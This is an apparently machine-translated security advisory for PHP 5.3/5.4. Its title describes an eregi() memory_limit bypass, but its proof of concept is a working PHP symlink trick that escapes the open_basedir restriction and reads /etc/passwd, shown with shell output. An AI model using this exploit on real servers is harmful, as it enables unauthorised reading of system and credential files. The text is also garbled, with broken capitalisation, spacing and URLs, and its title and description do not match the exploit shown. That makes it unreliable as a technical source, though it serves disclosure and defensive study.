PHP 5.4/5.3 discard function eregi () memory_limit Bypass Vulnerability

Release date: 2012-03-30
Updated on:

Affected Systems:
PHP 5.4.0
Description:
--------------------------------------------------------------------------------
PHP is an embedded HTML language. PHP is similar to Microsoft's ASP. It is a script language that is executed on the server side and embedded in HTML documents, the language style is similar to the C language and is widely used by many website programmers.

In Versions later than PHP 5.3, functions based on POSIX regular expressions are discarded. In version 5.4.0, these functions are still used, resulting in bypassing memory_limit and using eregi () to consume memory.

<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)

Link: http://marc.info /? L = bugtraq & m = 133311683110469 & w = 2

*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

PoC:
127 # cat sym. php
<? Php
Symlink ("/etc/passwd", "./symlink ");
?>
127 # php sym. php
PHP Warning: symlink (): open_basedir restriction in effect. File (/etc/passwd) is not \
Within the allowed path (s): (/www) in/www/test/sym. php on line 2

Warning: symlink (): open_basedir restriction in effect. File (/etc/passwd) is not \
Within the allowed path (s): (/www) in
/Www/test/sym. php on line 2
127 #

Open_basedir will disallow/etc/passwd.

Let's see:
127 # ls-la
Total 8
Drwxr-xr-x 2 www 512 Oct 20.
Drwxr-xr-x 13 www 1536 Oct 20 ..
-Rw-r -- 1 www 356 Oct 20 kakao. php
-Rw-r -- 1 www 45 Oct 20 00:26 sym. php
127 # pwd
/Www/test
127 # cat kakao. php
<? Php
Mkdir ("abc ");
Chdir ("abc ");
Mkdir ("etc ");
Chdir ("etc ");
Mkdir ("passwd ");
Chdir ("..");
Mkdir ("abc ");
Chdir ("abc ");
Mkdir ("abc ");
Chdir ("abc ");
Mkdir ("abc ");
Chdir ("abc ");
Chdir ("..");
Chdir ("..");
Chdir ("..");
Chdir ("..");
Symlink ("abc/abc", "tmplink ");
Symlink ("tmplink/.../etc/passwd", "exploit ");
Unlink ("tmplink ");
Mkdir ("tmplink ");
?>

127 # php kakao. php
127 # ls-la
Total 12
Drwxr-xr-x 4 www 512 Oct 20.
Drwxr-xr-x 13 www 1536 Oct 20 ..
Drwxr-xr-x 4 www 512 Oct 20 abc
Lrwxr-xr-x 1 www 27 Oct 20 exploit-> tmplink/..././etc/passwd
-Rw-r -- 1 www 356 Oct 20 kakao. php
-Rw-r -- 1 www 45 Oct 20 00:26 sym. php
Drwxr-xr-x 2 www 512 Oct 20 tmplink
127 # cat exploit
# Passwd
#
Root: *: 0: 0: god:/root:/bin/csh
..

Now "tmplink" is a directory. so link "exploit" will be ".../../etc/passwd". We don't \
Need bypass open_basedir, it is a design mistake. PHP will allow \
"Tmplink/.../etc/passwd" because./tmplink/.../etc/passwd really exists.

PoC:
Http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as a main security feature.

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.php.net